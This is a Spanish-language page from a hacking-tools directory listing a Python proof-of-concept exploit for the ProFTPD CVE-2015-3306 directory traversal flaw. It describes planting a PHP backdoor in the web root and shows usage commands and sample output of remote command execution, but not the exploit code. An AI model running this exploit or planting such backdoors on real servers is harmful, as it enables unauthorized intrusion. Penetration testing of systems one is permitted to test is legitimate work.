Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2015-3306 | Kitploit
Herramientas/GitHubGitHub/donmedfor/cve-2015-3306
Generación de PayloadsAnálisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de Penetración
GitHubdonmedfor/cve-2015-3306

CVE-2015-3306

Ver Repositorio
hace 0 añosAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2015-3306 Exploit de ProFTPD

Este repositorio contiene un exploit proof-of-concept (PoC) en Python para CVE-2015-3306

⚠️ Advertencia: Utilícelo únicamente contra sistemas que posea o para los que tenga permiso explícito de prueba. La explotación no autorizada es ilegal.


Autor

Mohamed EL-KHAROUATI


Parte 1: CVE-2015-3306 Exploit de ProFTPD

Descripción

CVE-2015-3306 es una vulnerabilidad de directory traversal en ProFTPD 1.3.5b y anteriores. Este exploit permite copiar archivos arbitrarios y colocar un backdoor PHP en la raíz web. El backdoor puede ejecutar comandos de shell arbitrarios.

Características

  • Explota la vulnerabilidad de directory traversal mediante los comandos FTP SITE CPFR/CPTO.
  • Coloca un backdoor PHP (backdoor.php) en la raíz web especificada.
  • Ejecuta comandos de shell arbitrarios a través del backdoor.
  • Soporta comandos personalizados mediante --rcommand.

Requisitos

  • Python 3.x
  • Librería requests (pip install requests)

Uso, Salida y Limpieza (Bloque de código único)

root@kitploit:~
# Ejecutar el exploit
python3 exploit.py --rhost <ip_objetivo> --rport <puerto_ftp> --rpath <ruta_raíz_web> --rcommand <comando_shell>

# Ejemplo:
python3 exploit.py --rhost <ip_objetivo> --rport <puerto_ftp_objetivo> --rpath /var/www/html --rcommand whoami

# Salida esperada:
[+] CVE-2015-3306 exploit by Mohamed EL-KHAROUATI
[+] Exploiting <ip_objetivo> 
[+] Running Command whoami
[+] Target exploited, accessing shell at http://<ip_objetivo> /backdoor.php
[+] Running whoami: www-data
[+] Done
Descargar herramienta